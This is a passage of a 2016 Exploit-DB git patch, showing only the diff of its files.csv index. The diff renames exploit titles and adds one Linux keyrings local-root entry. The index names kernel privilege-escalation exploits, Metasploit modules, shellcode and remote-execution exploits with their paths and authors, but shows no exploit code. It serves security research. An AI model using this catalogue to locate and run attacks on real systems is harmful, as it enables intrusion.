From 412cc0a204c53238185d906dd1e2d2282e694849 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Jun 2016 05:06:16 +0000 Subject: [PATCH] DB: 2016-06-23 4 new exploits Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2) Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2) Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3) Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3) Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1) Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3) Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2) Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3) Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2) Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF) Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF) Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit) Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit) PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF) PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit) Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf) Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) Poison Ivy 2.1.x C2 Buffer Overflow (msf) Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit) Bomgar Remote Support Unauthenticated Code Execution (msf) Bomgar Remote Support Unauthenticated Code Execution (Metasploit) Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf) Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit) DarkComet Server Remote File Download Exploit (msf) DarkComet Server Remote File Download Exploit (Metasploit) PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit) Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit) Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode --- files.csv | 50 +++--- platforms/linux/local/39277.c | 278 +++++++++++++----------------- platforms/linux/local/40003.c | 212 +++++++++++++++++++++++ platforms/php/remote/40004.rb | 132 ++++++++++++++ platforms/win32/shellcode/40005.c | 273 +++++++++++++++++++++++++++++ platforms/win64/remote/39999.rb | 140 +++++++++++++++ 6 files changed, 902 insertions(+), 183 deletions(-) create mode 100755 platforms/linux/local/40003.c create mode 100755 platforms/php/remote/40004.rb create mode 100755 platforms/win32/shellcode/40005.c create mode 100755 platforms/win64/remote/39999.rb diff --git a/files.csv b/files.csv index f1908ee12..80646c465 100755 --- a/files.csv +++ b/files.csv @@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 -778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0 +778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80 @@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 -895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 +895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0 @@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port 5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0 -5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0 +5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0 5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0 5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0 @@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0 -8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 +8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0 @@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0 -9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 +9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0 @@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 -9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0 +9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0 @@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 -9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0 +9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0 @@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 -9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0 +9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 @@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0 -9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 +9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 @@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 @@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0 -17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0 +17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0 @@ -16913,8 +16913,8 @@ id,file,description,date,author,platform,type,port 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0 -19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 -19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0 +19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 +19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)",1997-02-13,"Solar Designer",multiple,local,0 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0 @@ -30081,7 +30081,7 @@ id,file,description,date,author,platform,type,port 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 -33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0 +33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 @@ -35510,7 +35510,8 @@ id,file,description,date,author,platform,type,port 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 -39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0 +39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0 +40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -35922,11 +35923,11 @@ id,file,description,date,author,platform,type,port 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 -39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443 -39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443 +39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 +39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0 -39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21 +39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win32,remote,21 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0 @@ -36062,7 +36063,7 @@ id,file,description,date,author,platform,type,port 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 -39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0 +39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0 @@ -36094,7 +36095,7 @@ id,file,description,date,author,platform,type,port 39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0 39905,platforms/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash PoC",2016-06-09,halsten,multiple,dos,0 -39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (msf)",2016-06-10,"Jos Wetzels",windows,remote,3460 +39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0 39911,platforms/php/webapps/39911.html,"Mobiketa 